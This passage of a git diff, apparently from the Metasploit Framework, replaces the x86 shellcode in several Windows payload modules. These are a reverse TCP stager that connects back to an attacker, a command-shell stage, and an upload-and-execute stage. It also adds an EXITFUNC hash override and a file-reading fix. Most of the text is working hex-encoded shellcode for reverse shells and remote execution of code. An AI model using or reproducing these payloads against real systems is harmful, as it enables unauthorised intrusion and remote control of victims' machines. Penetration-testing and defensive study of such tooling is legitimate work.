"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + + "\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" + + "\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" + + "\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" + + "\x6E\x4D\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F" + + "\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58" + + "\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56\x53\x57\x68\x02\xD9" + + "\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3" } )) end diff --git a/modules/payloads/stagers/windows/passivex.rb b/modules/payloads/stagers/windows/passivex.rb index 07fb6f52b7..0d37407f3e 100644 --- a/modules/payloads/stagers/windows/passivex.rb +++ b/modules/payloads/stagers/windows/passivex.rb @@ -100,5 +100,18 @@ module Metasploit3 # Return the updated payload return p end - + + # for now we must let this payload use the old EXITFUNC hash values. + def replace_var(raw, name, offset, pack) + super + if( name == 'EXITFUNC' ) + datastore[name] = 'thread' if not datastore[name] + raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh' + raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread' + raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process' + return true + end + return false + end + end \ No newline at end of file diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index 457d12b90b..c7206b56ef 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -24,7 +24,7 @@ module Metasploit3 'Name' => 'Reverse TCP Stager', 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', - 'Author' => ['hdm', 'skape'], + 'Author' => ['hdm', 'skape', 'Stephen Fewer '], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -32,32 +32,26 @@ module Metasploit3 'Convention' => 'sockedi', 'Stager' => { - 'Offsets' => - { - 'LHOST' => [ 263, 'ADDR' ], - 'LPORT' => [ 270, 'n' ], - }, - 'Payload' => - "\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" + - "\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" + - "\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" + - "\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" + - "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" + - "\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b" + - "\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff" + - "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0" + - "\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68" + - "\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6" + - "\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00" + - "\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa" + - "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00" + - "\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05" + - "\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b" + - "\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40" + - "\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11" + - "\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06" + - "\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53" + - "\x57\xff\x55\x18\xff\xd3" + 'Offsets' => { 'LHOST' => [ 196, 'ADDR' ], 'LPORT' => [ 203, 'n' ], }, + 'RequiresMidstager' => false, + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + + "\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" + + "\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57" + + "\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00" + + "\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56" + + "\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" + + "\xEC\xC3" } )) end diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb index cbc816c264..6ac48a69d1 100644 --- a/modules/payloads/stages/windows/shell.rb +++ b/modules/payloads/stages/windows/shell.rb @@ -22,7 +22,7 @@ module Metasploit3 'Name' => 'Windows Command Shell', 'Version' => '$Revision$', 'Description' => 'Spawn a piped command shell', - 'Author' => 'spoonm', + 'Author' => [ 'spoonm', 'Stephen Fewer ' ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -35,39 +35,23 @@ module Metasploit3 { 'Offsets' => { - 'EXITFUNC' => [ 443, 'V' ] + 'EXITFUNC' => [ 210, 'V' ] }, - 'Payload' => - "\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00\x00"+ - "\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"+ - "\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31"+ - "\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54"+ - "\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c"+ - "\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc2\x08\x00\x6a\x30\x59"+ - "\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c\xad\x8b\x58\x08\x5e\x53\x68"+ - "\x8e\x4e\x0e\xec\xff\xd6\x97\x53\x56\x57\x8d\x44\x24\x10\x50\xff"+ - "\xd7\x50\x50\x50\x68\xb6\x19\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70"+ - "\xe9\xff\xd6\x95\x68\x08\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec"+ - "\x10\x89\xe5\x89\xee\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51"+ - "\x56\xad\x56\x53\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0"+ - "\x89\xe0\x6a\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68"+ - "\x43\x4d\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab"+ - "\x83\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"+ - "\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc\x54"+ - "\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72\xfe\xb3"+ - "\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4\x89\xe7\x6a"+ - "\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0\x31\xc0\x50\x57"+ - "\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07\xb4\xff\x55\x20\xff"+ - "\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74\x36\xe8\x77\x00\x00\x00"+ - "\x50\x89\xe1\x50\x51\x56\x57\xff\x75\x0c\x53\x68\x16\x65\xfa\x10"+ - "\xff\x55\x20\xff\xd0\x85\xc0\x74\x50\x31\xc0\x59\x39\xc8\x74\x11"+ - "\x50\x51\x57\xff\x75\x28\xff\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb"+ - "\xab\x89\xe0\xe8\x3f\x00\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28"+ - "\xff\x55\x14\x31\xc9\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52"+ - "\x50\x57\xff\x75\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0"+ - "\x85\xc0\x74\x05\x31\xc0\x59\xeb\xc8\x53\x68\x7e\xd8\xe2\x73\xff"+ - "\x55\x20\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75"+ - "\x28\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3" + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56" + + "\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44" + + "\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F" + + "\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF" + + "\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C" + + "\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5" } )) end diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb index 481de31ca8..63903dea7d 100644 --- a/modules/payloads/stages/windows/upexec.rb +++ b/modules/payloads/stages/windows/upexec.rb @@ -22,7 +22,7 @@ module Metasploit3 'Name' => 'Windows Upload/Execute', 'Version' => '$Revision$', 'Description' => 'Uploads an executable and runs it', - 'Author' => 'vlad902', + 'Author' => ['vlad902', 'Stephen Fewer ' ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -31,34 +31,33 @@ module Metasploit3 { 'Offsets' => { - 'EXITFUNC' => [ 385, 'V' ] + 'EXITFUNC' => [ 368, 'V' ] }, - 'Payload' => - "\x81\xec\x40\x00\x00\x00\xfc\x89\xfb\xe8\x48\x00\x00\x00\x60\x8b" + - "\x6c\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b" + - "\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0" + - "\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b" + - "\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b" + - "\x89\x6c\x24\x1c\x61\xc3\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b" + - "\x70\x1c\xad\x8b\x40\x08\x50\x89\xe6\x68\x8e\x4e\x0e\xec\xff\x36" + - "\xff\x56\x04\x66\x68\x00\x00\x66\x68\x33\x32\x68\x77\x73\x32\x5f" + - "\x89\xe5\x55\xff\xd0\x89\x46\x08\x68\xb6\x19\x18\xe7\xff\x76\x08" + - "\xff\x56\x04\x89\x46\x0c\x6a\x00\x6a\x04\x55\x53\xff\x56\x0c\x8b" + - "\x7d\x00\xe8\x0b\x00\x00\x00\x43\x3a\x5c\x74\x6d\x70\x2e\x65\x78" + - "\x65\x00\x58\x89\x46\x10\x68\xa5\x17\x00\x7c\xff\x36\xff\x56\x04" + - "\x6a\x00\x6a\x06\x6a\x04\x6a\x00\x6a\x07\x68\x00\x00\x00\xe0\xff" + - "\x76\x10\xff\xd0\x89\x46\x14\x81\xec\x04\x08\x00\x00\x89\xe5\x68" + - "\x1f\x79\x0a\xe8\xff\x36\xff\x56\x04\x89\x46\x18\x6a\x00\x68\x00" + - "\x08\x00\x00\x55\x53\xff\x56\x0c\x29\xc7\x50\x89\xe1\x6a\x00\x51" + - "\x50\x55\xff\x76\x14\xff\x56\x18\x58\x85\xff\x75\xdf\x68\xfb\x97" + - "\xfd\x0f\xff\x36\xff\x56\x04\xff\x76\x14\xff\xd0\x6a\x50\x59\x29" + - "\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42" + - "\x2c\x93\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x36\xff" + - "\x56\x04\x57\x52\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x10\x51\xff" + - "\xd0\x68\xad\xd9\x05\xce\xff\x36\xff\x56\x04\x6a\xff\xff\x37\xff" + - "\xd0\x68\x25\xb0\xff\xc2\xff\x36\xff\x56\x04\xff\x76\x10\xff\xd0" + - "\x68\xe7\x79\xc6\x79\xff\x76\x08\xff\x56\x04\xff\x77\xfc\xff\xd0" + - "\x68\x7e\xd8\xe2\x73\xff\x36\xff\x56\x04\xff\xd0" + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x6A\x7F\x58\xC1\xE0\x03\x29\xC4\x54\x50\x68\x30\xF3\x49\xE4\xFF" + + "\xD5\x8D\x04\x04\xC7\x00\x73\x76\x63\x2E\xC7\x40\x04\x65\x78\x65" + + "\x00\x89\xE0\x50\x6A\x00\x6A\x06\x6A\x02\x6A\x00\x6A\x07\x68\x00" + + "\x00\x00\xE0\x50\x68\xDA\xF6\xDA\x4F\xFF\xD5\x89\xC3\x54\x89\xE6" + + "\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" + + "\x04\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" + + "\x53\x53\x89\xE1\x6A\x00\x51\x56\x50\x53\x89\xC3\x6A\x00\x56\x53" + + "\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC" + + "\x68\x2D\x57\xAE\x5B\xFF\xD5\x59\x68\xC6\x96\x87\x52\xFF\xD5\x57" + + "\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01" + + "\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E" + + "\x56\x56\xFF\x74\x24\x78\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0" + + "\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\x57\x68\x75\x6E" + + "\x4D\x61\xFF\xD5\xFF\x74\x24\x58\x68\xD7\x2E\xDD\x13\xFF\xD5\xBB" + + "\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80" + + "\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5" } )) @@ -73,7 +72,12 @@ module Metasploit3 # def handle_connection_stage(conn) begin - data = ::IO.read(datastore['PEXEC']) + # bug fix for: data = ::IO.read(datastore['PEXEC']) + # the above does not return the entire contents + data = "" + File.open( datastore['PEXEC'], "rb" ) { |f| + data += f.read + } rescue print_error("Failed to read executable: #{$!}")